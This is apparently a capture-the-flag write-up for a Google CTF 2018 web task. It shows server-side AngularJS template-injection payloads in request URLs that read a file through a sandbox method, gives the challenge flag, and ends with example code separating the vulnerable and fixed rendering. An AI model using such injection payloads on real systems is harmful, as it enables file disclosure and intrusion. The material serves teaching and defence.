Google CTF 2018 Quals: Translate web task solution
This web application implements a translation service with a dictionary stored in memory.

One can dump the JSON dictionary and add values to it.

Upon observing the dumped dictionary it becomes obvious that the application performs server-side AngularJS rendering on some of the dictionary keys (which are web-site messages rather than translated words).

The solution is to overwrite a rendered dictionary value, enumerate the methods accessible inside the AngularJS sandbox, and find one that allows local file inclusion.

Executing Object.keys():

http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.constructor.prototype.constructor.keys(i18n)}}

Reading the flag:

http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{this.$parent.$parent.i18n.template(%27flag.txt%27)}}

or simply:

http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.template(%27flag.txt%27)}}

=> The result can be accessed at http://translate.ctfcompetition.com:1337/?query=in_lang_query_is_spelled&lang=fr:

CTF{Televersez_vos_exploits_dans_mon_nuagiciel}

One could also just bruteforce or guess the method name ("template").
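The root cause above is that a user-controlled dictionary value is compiled as a template instead of being treated as text. The following is an added example, not the task's own code: a crude stand-in for the vulnerable render step beside the fixed one, with a constructed `i18n` object whose `template()` method is a hypothetical file reader over an in-memory map.

```javascript
// Constructed in-memory "filesystem" and i18n store; not the challenge's real code.
const fakeFs = { 'flag.txt': 'CTF{constructed_placeholder}' };
const i18n = {
  greeting: 'Bonjour',
  // Hypothetical stand-in for the file-reading method the write-up abuses.
  template: (name) => fakeFs[name] ?? '',
};

// VULNERABLE: the stored translation itself is treated as a template, so any
// {{ }} inside it is evaluated against the scope. new Function + with() is a
// deliberately crude model of AngularJS $eval; the point is that user data
// reaches an expression evaluator at all.
function renderAsTemplate(value, scope) {
  return value.replace(/\{\{([\s\S]*?)\}\}/g, (_, expr) =>
    String(new Function('scope', 'with (scope) { return (' + expr + '); }')(scope)));
}

// FIXED: the translation is data. Only the application's own, fixed template is
// compiled; the value is interpolated as a plain string, so braces are inert.
function renderAsText(value) {
  return String(value);
}

// Defence in depth at the /add endpoint: refuse to store values carrying
// interpolation delimiters, so a regression in the renderer has nothing to feed on.
function acceptTranslation(value) {
  return !/\{\{|\}\}/.test(value);
}
```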